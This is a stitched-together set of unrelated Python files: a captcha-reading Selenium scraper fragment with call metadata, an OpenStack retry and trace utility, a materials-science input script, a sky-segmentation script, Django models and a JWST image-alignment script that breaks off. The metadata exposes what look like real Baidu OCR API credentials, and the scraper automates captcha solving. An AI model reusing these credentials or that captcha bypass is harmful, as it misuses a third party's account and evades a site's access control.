elemYzm.send_keys(yzm)
time.sleep(1)
print('#############点击')
driver.find_element_by_xpath("//a[@class='underline']").click()
elemYzm.send_keys('')
print(a)
print('#############')
time.sleep(1)
# browser_log = driver.get_log('performance')
# browser_log.reverse()
# print(browser_log)
# for i in browser_log:
# if i.get('message'):
# message_dict = json.loads(i.get('message'))
# file_download_url = message_dict.get('message').get('params').get('url') if message_dict else None
#
# print(file_download_url)
|
[
"pickle.dump",
"urllib.request.Request",
"json.loads",
"urllib.parse.urlencode",
"aip.AipOcr",
"urllib.request.urlopen",
"time.sleep",
"selenium.webdriver.support.wait.WebDriverWait",
"urllib.request.urlretrieve",
"selenium.webdriver.ChromeOptions",
"webdriver_manager.chrome.ChromeDriverManager",
"base64.b64encode",
"re.sub"
] |
[((446, 532), 'aip.AipOcr', 'AipOcr', (['"""18671664"""', '"""O0d2Tgv4imtAfVqhQF49py0o"""', '"""au1xuxZlqqROnOjlVqLCfHhO4lLQZICl"""'], {}), "('18671664', 'O0d2Tgv4imtAfVqhQF49py0o',\n 'au1xuxZlqqROnOjlVqLCfHhO4lLQZICl')\n", (452, 532), False, 'from aip import AipOcr\n'), ((1113, 1138), 'selenium.webdriver.ChromeOptions', 'webdriver.ChromeOptions', ([], {}), '()\n', (1136, 1138), False, 'from selenium import webdriver\n'), ((2352, 2365), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (2362, 2365), False, 'import time\n'), ((2653, 2666), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (2663, 2666), False, 'import time\n'), ((5479, 5493), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (5489, 5493), False, 'import time\n'), ((2694, 2707), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (2704, 2707), False, 'import time\n'), ((2800, 2842), 'urllib.request.urlretrieve', 'urllib.request.urlretrieve', (['img', '"""23.jpeg"""'], {}), "(img, '23.jpeg')\n", (2826, 2842), False, 'import urllib\n'), ((2864, 2877), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (2874, 2877), False, 'import time\n'), ((3774, 3812), 'urllib.request.Request', 'urllib.request.Request', (['url', 'post_data'], {}), '(url, post_data)\n', (3796, 3812), False, 'import urllib\n'), ((3981, 4012), 'urllib.request.urlopen', 'urllib.request.urlopen', (['request'], {}), '(request)\n', (4003, 4012), False, 'import urllib\n'), ((4455, 4468), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (4465, 4468), False, 'import time\n'), ((4596, 4609), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (4606, 4609), False, 'import time\n'), ((4792, 4805), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (4802, 4805), False, 'import time\n'), ((5894, 5935), 'urllib.request.urlretrieve', 'urllib.request.urlretrieve', (['img', '"""3.jpeg"""'], {}), "(img, '3.jpeg')\n", (5920, 5935), False, 'import urllib\n'), ((6341, 6354), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (6351, 6354), False, 'import time\n'), ((6488, 6501), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (6498, 6501), False, 'import time\n'), ((6670, 6683), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (6680, 6683), False, 'import time\n'), ((786, 823), 'pickle.dump', 'pickle.dump', (['requests_cookiejar', 'f', '(0)'], {}), '(requests_cookiejar, f, 0)\n', (797, 823), False, 'import pickle\n'), ((4182, 4196), 'json.loads', 'json.loads', (['ss'], {}), '(ss)\n', (4192, 4196), False, 'import json\n'), ((4314, 4335), 're.sub', 're.sub', (['"""\\\\s"""', '""""""', 'aa'], {}), "('\\\\s', '', aa)\n", (4320, 4335), False, 'import re\n'), ((5405, 5434), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['driver', '(120)', '(1)'], {}), '(driver, 120, 1)\n', (5418, 5434), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((1272, 1293), 'webdriver_manager.chrome.ChromeDriverManager', 'ChromeDriverManager', ([], {}), '()\n', (1291, 1293), False, 'from webdriver_manager.chrome import ChromeDriverManager\n'), ((3497, 3519), 'base64.b64encode', 'base64.b64encode', (['data'], {}), '(data)\n', (3513, 3519), False, 'import base64\n'), ((3714, 3743), 'urllib.parse.urlencode', 'urllib.parse.urlencode', (['bodys'], {}), '(bodys)\n', (3736, 3743), False, 'import urllib\n')]
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Utilities and helper functions."""
import functools
import inspect
import logging as py_logging
import retrying
import six
import time
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import strutils
from os_brick.i18n import _
LOG = logging.getLogger(__name__)
def retry(exceptions, interval=1, retries=3, backoff_rate=2):
def _retry_on_exception(e):
return isinstance(e, exceptions)
def _backoff_sleep(previous_attempt_number, delay_since_first_attempt_ms):
exp = backoff_rate ** previous_attempt_number
wait_for = max(0, interval * exp)
LOG.debug("Sleeping for %s seconds", wait_for)
return wait_for * 1000.0
def _print_stop(previous_attempt_number, delay_since_first_attempt_ms):
delay_since_first_attempt = delay_since_first_attempt_ms / 1000.0
LOG.debug("Failed attempt %s", previous_attempt_number)
LOG.debug("Have been at this for %s seconds",
delay_since_first_attempt)
return previous_attempt_number == retries
if retries < 1:
raise ValueError(_('Retries must be greater than or '
'equal to 1 (received: %s). ') % retries)
def _decorator(f):
@six.wraps(f)
def _wrapper(*args, **kwargs):
r = retrying.Retrying(retry_on_exception=_retry_on_exception,
wait_func=_backoff_sleep,
stop_func=_print_stop)
return r.call(f, *args, **kwargs)
return _wrapper
return _decorator
def platform_matches(current_platform, connector_platform):
curr_p = current_platform.upper()
conn_p = connector_platform.upper()
if conn_p == 'ALL':
return True
# Add tests against families of platforms
if curr_p == conn_p:
return True
return False
def os_matches(current_os, connector_os):
curr_os = current_os.upper()
conn_os = connector_os.upper()
if conn_os == 'ALL':
return True
# add tests against OSs
if (conn_os == curr_os or
conn_os in curr_os):
return True
return False
def merge_dict(dict1, dict2):
"""Try to safely merge 2 dictionaries."""
if type(dict1) is not dict:
raise Exception("dict1 is not a dictionary")
if type(dict2) is not dict:
raise Exception("dict2 is not a dictionary")
dict3 = dict1.copy()
dict3.update(dict2)
return dict3
def trace(f):
"""Trace calls to the decorated function.
This decorator should always be defined as the outermost decorator so it
is defined last. This is important so it does not interfere
with other decorators.
Using this decorator on a function will cause its execution to be logged at
`DEBUG` level with arguments, return values, and exceptions.
:returns: a function decorator
"""
func_name = f.__name__
@functools.wraps(f)
def trace_logging_wrapper(*args, **kwargs):
if len(args) > 0:
maybe_self = args[0]
else:
maybe_self = kwargs.get('self', None)
if maybe_self and hasattr(maybe_self, '__module__'):
logger = logging.getLogger(maybe_self.__module__)
else:
logger = LOG
# NOTE(ameade): Don't bother going any further if DEBUG log level
# is not enabled for the logger.
if not logger.isEnabledFor(py_logging.DEBUG):
return f(*args, **kwargs)
all_args = inspect.getcallargs(f, *args, **kwargs)
logger.debug('==> %(func)s: call %(all_args)r',
{'func': func_name,
# NOTE(mriedem): We have to stringify the dict first
# and don't use mask_dict_password because it results in
# an infinite recursion failure.
'all_args': strutils.mask_password(
six.text_type(all_args))})
start_time = time.time() * 1000
try:
result = f(*args, **kwargs)
except Exception as exc:
total_time = int(round(time.time() * 1000)) - start_time
logger.debug('<== %(func)s: exception (%(time)dms) %(exc)r',
{'func': func_name,
'time': total_time,
'exc': exc})
raise
total_time = int(round(time.time() * 1000)) - start_time
if isinstance(result, dict):
mask_result = strutils.mask_dict_password(result)
elif isinstance(result, six.string_types):
mask_result = strutils.mask_password(result)
else:
mask_result = result
logger.debug('<== %(func)s: return (%(time)dms) %(result)r',
{'func': func_name,
'time': total_time,
'result': mask_result})
return result
return trace_logging_wrapper
def convert_str(text):
"""Convert to native string.
Convert bytes and Unicode strings to native strings:
* convert to bytes on Python 2:
encode Unicode using encodeutils.safe_encode()
* convert to Unicode on Python 3: decode bytes from UTF-8
"""
if six.PY2:
return encodeutils.to_utf8(text)
else:
if isinstance(text, bytes):
return text.decode('utf-8')
else:
return text
|
[
"oslo_log.log.getLogger",
"oslo_utils.strutils.mask_password",
"oslo_utils.strutils.mask_dict_password",
"inspect.getcallargs",
"retrying.Retrying",
"os_brick.i18n._",
"time.time",
"six.text_type",
"oslo_utils.encodeutils.to_utf8",
"functools.wraps",
"six.wraps"
] |
[((854, 881), 'oslo_log.log.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (871, 881), True, 'from oslo_log import log as logging\n'), ((3515, 3533), 'functools.wraps', 'functools.wraps', (['f'], {}), '(f)\n', (3530, 3533), False, 'import functools\n'), ((1832, 1844), 'six.wraps', 'six.wraps', (['f'], {}), '(f)\n', (1841, 1844), False, 'import six\n'), ((4096, 4135), 'inspect.getcallargs', 'inspect.getcallargs', (['f', '*args'], {}), '(f, *args, **kwargs)\n', (4115, 4135), False, 'import inspect\n'), ((5851, 5876), 'oslo_utils.encodeutils.to_utf8', 'encodeutils.to_utf8', (['text'], {}), '(text)\n', (5870, 5876), False, 'from oslo_utils import encodeutils\n'), ((1900, 2011), 'retrying.Retrying', 'retrying.Retrying', ([], {'retry_on_exception': '_retry_on_exception', 'wait_func': '_backoff_sleep', 'stop_func': '_print_stop'}), '(retry_on_exception=_retry_on_exception, wait_func=\n _backoff_sleep, stop_func=_print_stop)\n', (1917, 2011), False, 'import retrying\n'), ((3788, 3828), 'oslo_log.log.getLogger', 'logging.getLogger', (['maybe_self.__module__'], {}), '(maybe_self.__module__)\n', (3805, 3828), True, 'from oslo_log import log as logging\n'), ((4575, 4586), 'time.time', 'time.time', ([], {}), '()\n', (4584, 4586), False, 'import time\n'), ((5099, 5134), 'oslo_utils.strutils.mask_dict_password', 'strutils.mask_dict_password', (['result'], {}), '(result)\n', (5126, 5134), False, 'from oslo_utils import strutils\n'), ((1694, 1758), 'os_brick.i18n._', '_', (['"""Retries must be greater than or equal to 1 (received: %s). """'], {}), "('Retries must be greater than or equal to 1 (received: %s). ')\n", (1695, 1758), False, 'from os_brick.i18n import _\n'), ((5212, 5242), 'oslo_utils.strutils.mask_password', 'strutils.mask_password', (['result'], {}), '(result)\n', (5234, 5242), False, 'from oslo_utils import strutils\n'), ((4526, 4549), 'six.text_type', 'six.text_type', (['all_args'], {}), '(all_args)\n', (4539, 4549), False, 'import six\n'), ((5001, 5012), 'time.time', 'time.time', ([], {}), '()\n', (5010, 5012), False, 'import time\n'), ((4715, 4726), 'time.time', 'time.time', ([], {}), '()\n', (4724, 4726), False, 'import time\n')]
|
from emto_input_generator import *
import numpy as np
folder = os.getcwd() # Get current working directory.
emtopath = folder+"/L11_CuPt" # Folder where the calculations will be performed.
latpath = emtopath
# L11 CuPt
prims = np.array([[1.0,0.5,0.5],
[0.5,1.0,0.5],
[0.5,0.5,1.0]])
basis = np.array([[0.0,0.0,0.0],
[0.5,0.5,0.5]])
species = ["Cu","Pt"]
species_cpa = [["cu","pt"],["cu","pt"]]
input_creator = EMTO(folder=emtopath)
input_creator.init_structure(latpath=latpath,
prims=prims,
basis=basis,
species=species,
latname='L11')
input_creator.init_bulk(atoms_cpa=species_cpa)
sws_range = np.linspace(2,3,6)
#input_creator.write_bmdl_kstr_shape_input()
#input_creator.write_kgrn_kfcd_input()
input_creator.write_kgrn_kfcd_swsrange(sws=sws_range)
#input_creator.draw_structure('standard_conv')
|
[
"numpy.array",
"numpy.linspace"
] |
[((240, 301), 'numpy.array', 'np.array', (['[[1.0, 0.5, 0.5], [0.5, 1.0, 0.5], [0.5, 0.5, 1.0]]'], {}), '([[1.0, 0.5, 0.5], [0.5, 1.0, 0.5], [0.5, 0.5, 1.0]])\n', (248, 301), True, 'import numpy as np\n'), ((343, 387), 'numpy.array', 'np.array', (['[[0.0, 0.0, 0.0], [0.5, 0.5, 0.5]]'], {}), '([[0.0, 0.0, 0.0], [0.5, 0.5, 0.5]])\n', (351, 387), True, 'import numpy as np\n'), ((786, 806), 'numpy.linspace', 'np.linspace', (['(2)', '(3)', '(6)'], {}), '(2, 3, 6)\n', (797, 806), True, 'import numpy as np\n')]
|
import numpy as np
import cv2
import math
from PIL import Image, ImageStat
import sys
from os import listdir
import pymeanshift as pms
import os.path
# path1 = "/Users/caijieyang/Desktop/allgoodthinghere/"
# files= listdir(path1)
avg_recall=[]
avg_pre=[]
hsl_acc_list=[]
manual_acc_list=[]
file = sys.argv[1]
file = str(file)
# print (file)
origin = Image.open(file)
width, height = origin.size
area = (0, 0, width, 0.5*height)
image = origin.crop(area) # crop top half of the image
image.save(file+"_cropped.png")
original_image = cv2.imread(file+"_cropped.png")
(segmented_image, label_image, number_regions) = pms.segment(original_image, spatial_radius=7,
range_radius=8, min_density=300)
counterclass_all={}
for j in range(0,len(label_image[0])):
for i in range(0,len(label_image)):
if label_image[i,j] in counterclass_all:
counterclass_all[label_image[i,j]] +=1
else:
counterclass_all[label_image[i,j]] = 1
max=0
for i in counterclass_all:
if counterclass_all[i]>max:
max=counterclass_all[i]
most_common_colour=i
origin=cv2.imread(file)
data = np.asarray(origin,dtype="int32")
RED = 2
GREEN = 1
BLUE = 0
for i in range (len(original_image)):
for j in range (len(original_image[0])):
if label_image[i][j] == most_common_colour:
data[i, j, GREEN] = 0
data[i, j, RED] = 0
data[i, j, BLUE] = 255
else:
continue
result = Image.fromarray(data.astype(np.uint8))
b, g, r = result.split()
result = Image.merge("RGB", (r, g, b))
result.save(file+"ms_sky_mark.png")
ms = Image.fromarray(segmented_image)
b, g, r = ms.split()
im = Image.merge("RGB", (r, g, b))
im.save(file+"ms_cluster_mark.png")
tempfile = file.replace('.png',' - Copy.png')
if os.path.isfile(tempfile):
marked_pixel_values = cv2.imread(tempfile)
true_po_list=[]
precision_list=[]
true_sky_counter=0
true_positive_counter=0
false_positive_counter=0
# print (marked_pixel_values[0,0])
# print (int(len(marked_pixel_values)/2+1))
for i in range(int(len(marked_pixel_values)/2+1)):
for j in range(len(marked_pixel_values[0])):
if marked_pixel_values[i][j][0] == 255 and marked_pixel_values[i][j][1] == 0 and marked_pixel_values[i][j][2] == 0 :
true_sky_counter+=1
if data[i][j][0] == 255 and data[i][j][1] == 0 and data[i][j][2] == 0:
true_positive_counter+=1
else:
if data[i][j][0] == 255 and data[i][j][1] == 0 and data[i][j][2] == 0:
false_positive_counter+=1
avg_recall.append(true_positive_counter/true_sky_counter)
avg_pre.append(true_positive_counter/(true_positive_counter+false_positive_counter))
hsl_acc_list.append((true_positive_counter+false_positive_counter)/((len(marked_pixel_values)/2+1)*len(marked_pixel_values[0])))
manual_acc_list.append(true_sky_counter/((len(marked_pixel_values)/2+1)*len(marked_pixel_values[0])))
print ("meanshift program marked proportion:", (true_positive_counter+false_positive_counter)/((len(marked_pixel_values)/2+1)*len(marked_pixel_values[0])))
print ("manually marked proportion:",true_sky_counter/((len(marked_pixel_values)/2+1)*len(marked_pixel_values[0])))
# print ("recall: ", avg_recall)
# print ("precision: " , avg_pre)
# print ("recall: ", np.mean(avg_recall))
# print ("precision: " , np.mean(avg_pre))
# print (hsl_acc_list)
# print (manual_acc_list)
|
[
"numpy.asarray",
"PIL.Image.open",
"pymeanshift.segment",
"cv2.imread",
"PIL.Image.fromarray",
"PIL.Image.merge"
] |
[((351, 367), 'PIL.Image.open', 'Image.open', (['file'], {}), '(file)\n', (361, 367), False, 'from PIL import Image, ImageStat\n'), ((534, 567), 'cv2.imread', 'cv2.imread', (["(file + '_cropped.png')"], {}), "(file + '_cropped.png')\n", (544, 567), False, 'import cv2\n'), ((616, 694), 'pymeanshift.segment', 'pms.segment', (['original_image'], {'spatial_radius': '(7)', 'range_radius': '(8)', 'min_density': '(300)'}), '(original_image, spatial_radius=7, range_radius=8, min_density=300)\n', (627, 694), True, 'import pymeanshift as pms\n'), ((1143, 1159), 'cv2.imread', 'cv2.imread', (['file'], {}), '(file)\n', (1153, 1159), False, 'import cv2\n'), ((1168, 1201), 'numpy.asarray', 'np.asarray', (['origin'], {'dtype': '"""int32"""'}), "(origin, dtype='int32')\n", (1178, 1201), True, 'import numpy as np\n'), ((1548, 1577), 'PIL.Image.merge', 'Image.merge', (['"""RGB"""', '(r, g, b)'], {}), "('RGB', (r, g, b))\n", (1559, 1577), False, 'from PIL import Image, ImageStat\n'), ((1621, 1653), 'PIL.Image.fromarray', 'Image.fromarray', (['segmented_image'], {}), '(segmented_image)\n', (1636, 1653), False, 'from PIL import Image, ImageStat\n'), ((1680, 1709), 'PIL.Image.merge', 'Image.merge', (['"""RGB"""', '(r, g, b)'], {}), "('RGB', (r, g, b))\n", (1691, 1709), False, 'from PIL import Image, ImageStat\n'), ((1845, 1865), 'cv2.imread', 'cv2.imread', (['tempfile'], {}), '(tempfile)\n', (1855, 1865), False, 'import cv2\n')]
|
from colorful.fields import RGBColorField
from django.db import models
from django.contrib.auth.models import User
from datetime import date
from django.urls import reverse
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
github = models.URLField(verbose_name="GitHub", blank=True, default="")
telegram_nick = models.TextField(verbose_name="Telegram", blank=True, default="")
discord_nick = models.TextField(verbose_name="Discord", blank=True, default="")
tags = models.ManyToManyField("Tag")
bio = models.TextField(
"Sobre você",
default="",
help_text="Descreva sobre você para os amiginhos poderem te conhecer melhor!!",
)
def __str__(self):
return "{} {}".format(self.user.first_name, self.user.last_name)
def __repr__(self):
return "{} {}".format(self.user.first_name, self.user.last_name)
class Meta:
verbose_name = "Perfil"
verbose_name_plural = "Perfis"
class StudyRoom(models.Model):
group_name = models.CharField("Nome do grupo", max_length=500, blank=False)
telegram_group = models.URLField(verbose_name="Telegram", blank=True, default="")
discord_group = models.URLField(verbose_name="Discord", blank=True, default="")
# users_group = models.ManyToManyField("Profile")
tags_group = models.ManyToManyField("Tag")
limit_date = models.DateField(verbose_name="Data expiracao do Grupo", default=date.today)
def __str__(self):
return self.group_name
def __repr__(self):
return self.group_name
def get_absolute_url(self):
return reverse('create-group', kwargs={'pk': self.pk})
class Tag(models.Model):
name = models.CharField("Tag", max_length=100, default="", blank=False)
color = RGBColorField()
def __str__(self):
return self.name
def __repr__(self):
return self.name
|
[
"django.db.models.OneToOneField",
"django.db.models.TextField",
"django.db.models.ManyToManyField",
"django.db.models.URLField",
"colorful.fields.RGBColorField",
"django.db.models.CharField",
"django.urls.reverse",
"django.db.models.DateField"
] |
[((215, 267), 'django.db.models.OneToOneField', 'models.OneToOneField', (['User'], {'on_delete': 'models.CASCADE'}), '(User, on_delete=models.CASCADE)\n', (235, 267), False, 'from django.db import models\n'), ((281, 343), 'django.db.models.URLField', 'models.URLField', ([], {'verbose_name': '"""GitHub"""', 'blank': '(True)', 'default': '""""""'}), "(verbose_name='GitHub', blank=True, default='')\n", (296, 343), False, 'from django.db import models\n'), ((364, 429), 'django.db.models.TextField', 'models.TextField', ([], {'verbose_name': '"""Telegram"""', 'blank': '(True)', 'default': '""""""'}), "(verbose_name='Telegram', blank=True, default='')\n", (380, 429), False, 'from django.db import models\n'), ((449, 513), 'django.db.models.TextField', 'models.TextField', ([], {'verbose_name': '"""Discord"""', 'blank': '(True)', 'default': '""""""'}), "(verbose_name='Discord', blank=True, default='')\n", (465, 513), False, 'from django.db import models\n'), ((525, 554), 'django.db.models.ManyToManyField', 'models.ManyToManyField', (['"""Tag"""'], {}), "('Tag')\n", (547, 554), False, 'from django.db import models\n'), ((565, 692), 'django.db.models.TextField', 'models.TextField', (['"""Sobre você"""'], {'default': '""""""', 'help_text': '"""Descreva sobre você para os amiginhos poderem te conhecer melhor!!"""'}), "('Sobre você', default='', help_text=\n 'Descreva sobre você para os amiginhos poderem te conhecer melhor!!')\n", (581, 692), False, 'from django.db import models\n'), ((1052, 1114), 'django.db.models.CharField', 'models.CharField', (['"""Nome do grupo"""'], {'max_length': '(500)', 'blank': '(False)'}), "('Nome do grupo', max_length=500, blank=False)\n", (1068, 1114), False, 'from django.db import models\n'), ((1136, 1200), 'django.db.models.URLField', 'models.URLField', ([], {'verbose_name': '"""Telegram"""', 'blank': '(True)', 'default': '""""""'}), "(verbose_name='Telegram', blank=True, default='')\n", (1151, 1200), False, 'from django.db import models\n'), ((1221, 1284), 'django.db.models.URLField', 'models.URLField', ([], {'verbose_name': '"""Discord"""', 'blank': '(True)', 'default': '""""""'}), "(verbose_name='Discord', blank=True, default='')\n", (1236, 1284), False, 'from django.db import models\n'), ((1356, 1385), 'django.db.models.ManyToManyField', 'models.ManyToManyField', (['"""Tag"""'], {}), "('Tag')\n", (1378, 1385), False, 'from django.db import models\n'), ((1403, 1479), 'django.db.models.DateField', 'models.DateField', ([], {'verbose_name': '"""Data expiracao do Grupo"""', 'default': 'date.today'}), "(verbose_name='Data expiracao do Grupo', default=date.today)\n", (1419, 1479), False, 'from django.db import models\n'), ((1725, 1789), 'django.db.models.CharField', 'models.CharField', (['"""Tag"""'], {'max_length': '(100)', 'default': '""""""', 'blank': '(False)'}), "('Tag', max_length=100, default='', blank=False)\n", (1741, 1789), False, 'from django.db import models\n'), ((1802, 1817), 'colorful.fields.RGBColorField', 'RGBColorField', ([], {}), '()\n', (1815, 1817), False, 'from colorful.fields import RGBColorField\n'), ((1639, 1686), 'django.urls.reverse', 'reverse', (['"""create-group"""'], {'kwargs': "{'pk': self.pk}"}), "('create-group', kwargs={'pk': self.pk})\n", (1646, 1686), False, 'from django.urls import reverse\n')]
|
#!/usr/bin/env python
#
# fix_settling_shifts.py
#
# Author: <NAME>, STScI, February 2022
#
# Script to fix shifts between groups introduced by settling issue.
#
# Input arguments:
# required: image filename (single "uncal.fits" file)
# optional: boxpeaksize (box size for searching central peak; default=20 pixels)
# optional: boxfitsize (box size for fitting central peak; default=200 pixels)
#
# Output: Level-2 calibrated file ("cal.fits" file)
#
#
# Example of how to run it - from the unix command line:
#
# $ fix_settling_shifts.py jw01143001001_02101_00001_nrcalong_uncal.fits
#
# which produces:
# jw01143001001_02101_00001_nrcalong_cal.fits
import argparse, os, sys
from glob import glob
import astropy
from astropy.io import ascii as asc
from astropy.io import fits
from astropy import stats
from astropy import nddata
from astropy.nddata import block_reduce
from astropy.modeling import models, fitting
import jwst
from jwst.pipeline import calwebb_detector1
from jwst.pipeline import Detector1Pipeline
from jwst.pipeline import Image2Pipeline
from jwst.jump import JumpStep
from jwst.ramp_fitting import RampFitStep
from jwst.gain_scale import GainScaleStep
import scipy
from scipy.ndimage import gaussian_filter, median_filter
from scipy import signal
import numpy as np
def crosscorfit(data_template,data_to_be_shifted,corrboxpeak,corrboxfit):
#
corr = scipy.signal.fftconvolve(data_template,data_to_be_shifted[::-1,::-1],mode='same')
#
xcen,ycen = int(float(corr.shape[0])/2.),int(float(corr.shape[1])/2.)
#
box2 = int(float(corrboxpeak)/2.)
#
ypeak,xpeak = np.unravel_index(np.argmax(corr[ycen-box2:ycen+box2,xcen-box2:xcen+box2]),(corrboxpeak,corrboxpeak))
#
x0,y0 = xcen-box2+xpeak,ycen-box2+ypeak
#
ampl = corr[y0,x0]
#
x_stddev0,y_stddev0 = 2.,2.
#
corrboxfit2 = float(corrboxfit)/2.
#
x1,y1 = xcen-int(corrboxfit2),ycen-int(corrboxfit2)
x2,y2 = x1+corrboxfit,y1+corrboxfit
#
corr_fit = corr[y1:y2,x1:x2]
#
x0fit,y0fit = x0-x1,y0-y1
#
y_array_2d,x_array_2d = np.mgrid[:corrboxfit,:corrboxfit]
#
gfit_init = models.Gaussian2D(amplitude=ampl,x_mean=x0fit,y_mean=y0fit,x_stddev=x_stddev0,y_stddev=y_stddev0,theta=0.)
gfit_init.theta.fixed = True
#
gfit_model = fitting.LevMarLSQFitter()
gfit_results = gfit_model(gfit_init,x_array_2d,y_array_2d,corr_fit)
#
amplfit = gfit_results.amplitude.value
thetafit = gfit_results.theta.value
xfit,yfit = gfit_results.x_mean.value,gfit_results.y_mean.value
xsigma,ysigma = gfit_results.x_stddev.value,gfit_results.y_stddev.value
dx,dy = xfit-corrboxfit2,yfit-corrboxfit2
#
print('fit1 results: %s %3i %3i %5i %5i %8.3f %8.3f %8.3f %8.3f %14.1f %14.1f %8.3f %8.3f %8.3f' % (uncalfile,ni+1,ng+1,x0fit,y0fit,xfit,yfit,dx,dy,ampl,amplfit,thetafit,xsigma,ysigma))
#
#
sigma_new = np.min([xsigma,ysigma])
#
gfit_init2 = models.Gaussian2D(amplitude=ampl,x_mean=x0fit,y_mean=y0fit,x_stddev=sigma_new,y_stddev=sigma_new,theta=0.)
gfit_init2.x_stddev.fixed = True
gfit_init2.y_stddev.fixed = True
gfit_init2.theta.fixed = True
#
gfit_model2 = fitting.LevMarLSQFitter()
gfit_results2 = gfit_model2(gfit_init2,x_array_2d,y_array_2d,corr_fit)
#
amplfit = gfit_results2.amplitude.value
thetafit = gfit_results2.theta.value
xfit,yfit = gfit_results2.x_mean.value,gfit_results2.y_mean.value
xsigma,ysigma = gfit_results2.x_stddev.value,gfit_results2.y_stddev.value
dx,dy = xfit-corrboxfit2,yfit-corrboxfit2
#
print('fit2 results: %s %3i %3i %5i %5i %8.3f %8.3f %8.3f %8.3f %14.1f %14.1f %8.3f %8.3f %8.3f' % (uncalfile,ni+1,ng+1,x0fit,y0fit,xfit,yfit,dx,dy,ampl,amplfit,thetafit,xsigma,ysigma))
#
if ((xpeak in [0,corrboxpeak]) or (ypeak in [0,corrboxpeak])): exit_need_adjustment('xpeak, ypeak = '+repr(xpeak)+', '+repr(ypeak)+'; corrboxpeak = '+repr(corrboxpeak))
if ((xsigma > box2) or (ysigma > box2)): exit_need_adjustment('xsigma, ysigma = '+repr(xsigma)+', '+repr(ysigma)+'; box2 = '+repr(box2))
#
return dx,dy
def apply_shift(data_to_be_shifted,dx,dy,bkgd):
#
dxi,dyi = round(dx),round(dy)
#
ny,nx = data_to_be_shifted.shape
#
if (dxi >= 0):
x1old,x2old = 0,nx-dxi
x1new,x2new = dxi,nx
else:
x1old,x2old = -dxi,nx
x1new,x2new = 0,nx+dxi
#
if (dyi >= 0):
y1old,y2old = 0,ny-dyi
y1new,y2new = dyi,ny
else:
y1old,y2old = -dyi,ny
y1new,y2new = 0,ny+dyi
#
data_to_be_shifted_new = np.full(data_to_be_shifted.shape,bkgd,dtype=np.float32)
data_to_be_shifted_new[y1new:y2new,x1new:x2new] = data_to_be_shifted[y1old:y2old,x1old:x2old]
#
return data_to_be_shifted_new
def exit_need_adjustment(err_info):
#
print('''
***
*** ERROR - The code has encountered potentially problematic results, and is therefore exiting.
***''')
print(' *** Error info is: ',err_info)
print(''' ***
***
*** Please contact the author (<NAME>) to discuss how to run it on this dataset.
***
''')
sys.exit()
if __name__ == '__main__':
#
print('''
*** -----------------------------------------------------------------------------------
***
*** fix_settling_shifts.py
***
*** Author: <NAME>, STScI, February 2022
***
*** Script to fix shifts between groups introduced by settling issue.
***
*** Input arguments:
*** required: image filename (single "uncal.fits" file)
*** optional: boxpeaksize (box size for searching central peak; default=20 pixels)
*** optional: boxfitsize (box size for fitting central peak; default=200 pixels)
***
*** Output: Level-2 calibrated file ("cal.fits" file)
***
***
*** Example of how to run it - from the unix command line:
***
*** $ fix_settling_shifts.py jw01143001001_02101_00001_nrcalong_uncal.fits
***
*** which produces:
*** jw01143001001_02101_00001_nrcalong_cal.fits
***
*** -----------------------------------------------------------------------------------
''')
#
parser = argparse.ArgumentParser(description='Fix shifts between groups introduced by settling issue.')
parser.add_argument('image', default='NONE', type=str, help='Input uncal.fits filename')
parser.add_argument('-bp','--boxpeaksize',default=20, type=int, help='Box size for searching central peak')
parser.add_argument('-bf','--boxfitsize',default=200, type=int, help='Box size for fitting central peak')
#
options = parser.parse_args()
uncalfile = options.image
corrboxpeak = options.boxpeaksize
corrboxfit = options.boxfitsize
#
parameter_dict = {'jump': {'skip': True},
'ramp_fit': {'skip': True},
'gain_scale': {'skip': True}}
#
rampfile = uncalfile.replace('_uncal.fits', '_ramp.fits')
#
if (not os.path.exists(rampfile)):
rampdata = calwebb_detector1.Detector1Pipeline.call(uncalfile, steps=parameter_dict, save_results=True)
#
hdr0 = fits.getheader(uncalfile,0)
n_ints = hdr0['NINTS']
n_grps_per_int = hdr0['NGROUPS']
#
data = fits.getdata(uncalfile,1)
#
ramp_cube_aligned = np.zeros(data.shape).astype(np.float32)
#
first_group = True
for ni in range(n_ints):
#
for ng in range(n_grps_per_int):
#
if (ng != 0): data_intgrp_prev = data_intgrp
#
data_intgrp = fits.getdata(rampfile,1)[ni,ng,:,:]
#
if (ng == 0):
#
data_diff = data_intgrp
#
else:
#
data_diff = data_intgrp - data_intgrp_prev
#
mean,med,rms = stats.sigma_clipped_stats(data_diff, maxiters=10, sigma_lower=6., sigma_upper=4)
#
print('n_int = ',ni+1,'; n_grp = ',ng+1,'; mean, med, rms = ',mean,med,rms)
#
data_diff_med = scipy.ndimage.median_filter(input=data_diff, size=3, mode='constant', cval=0.)
#
data_diff_sub = data_diff_med - med
#
data_diff_sub[np.where(data_diff_sub < (5.*rms))] = 0.
#
data_diff_sub_gauss = gaussian_filter(data_diff_sub, sigma=1.0, truncate=5., order=0, mode='constant', cval=0.).astype(np.float32)
#
if (first_group):
#
first_group = False
#
group_template = data_diff_sub_gauss
#
ramp_cube_aligned[0,0,:,:] = data_diff
#
else:
#
dx,dy = crosscorfit(group_template,data_diff_sub_gauss,corrboxpeak,corrboxfit)
#
